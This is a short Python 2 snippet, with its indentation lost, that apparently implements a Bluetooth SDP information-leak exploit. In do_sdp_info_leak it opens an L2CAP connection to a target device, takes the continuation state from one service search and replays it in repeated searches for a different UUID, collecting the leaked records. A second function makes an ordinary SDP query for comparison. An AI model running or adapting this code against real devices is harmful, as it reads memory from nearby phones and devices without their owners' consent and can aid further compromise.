def do_sdp_info_leak(dst, src):
socket = btsock.l2cap_connect((dst, SDP_PSM), (src, 0), MIN_MTU)
socket.send(sdp.pack_search_request(sdp.L2CAP_UUID))
response = sdp.unpack_sdp_pdu(socket.recv(4096))
response['payload'] = sdp.unpack_search_response(response['payload'])
result = []
for i in range(20):
cstate = response['payload']['cstate']
assert cstate != b''
socket.send(sdp.pack_search_request(sdp.ATT_UUID, cstate=cstate))
response = sdp.unpack_sdp_pdu(socket.recv(4096))
response['payload'] = sdp.unpack_search_response(response['payload'])
result.append(response['payload']['records'])
return result
def my_sdp_info(dst):
socket = btsock.l2cap_connect((dst, SDP_PSM), mtu=MIN_MTU)
socket.send(sdp.pack_search_request(sdp.L2CAP_UUID))
response = sdp.unpack_sdp_pdu(socket.recv(4096))
response['payload'] = sdp.unpack_search_response(response['payload'])
print response
result = []
for i in range(20):
cstate = response['payload']['cstate']
if cstate == b'':
break
socket.send(sdp.pack_search_request(sdp.L2CAP_UUID, cstate=cstate))
response = sdp.unpack_sdp_pdu(socket.recv(4096))
response['payload'] = sdp.unpack_search_response(response['payload'])
print response
result.append(response['payload']['records'])
return result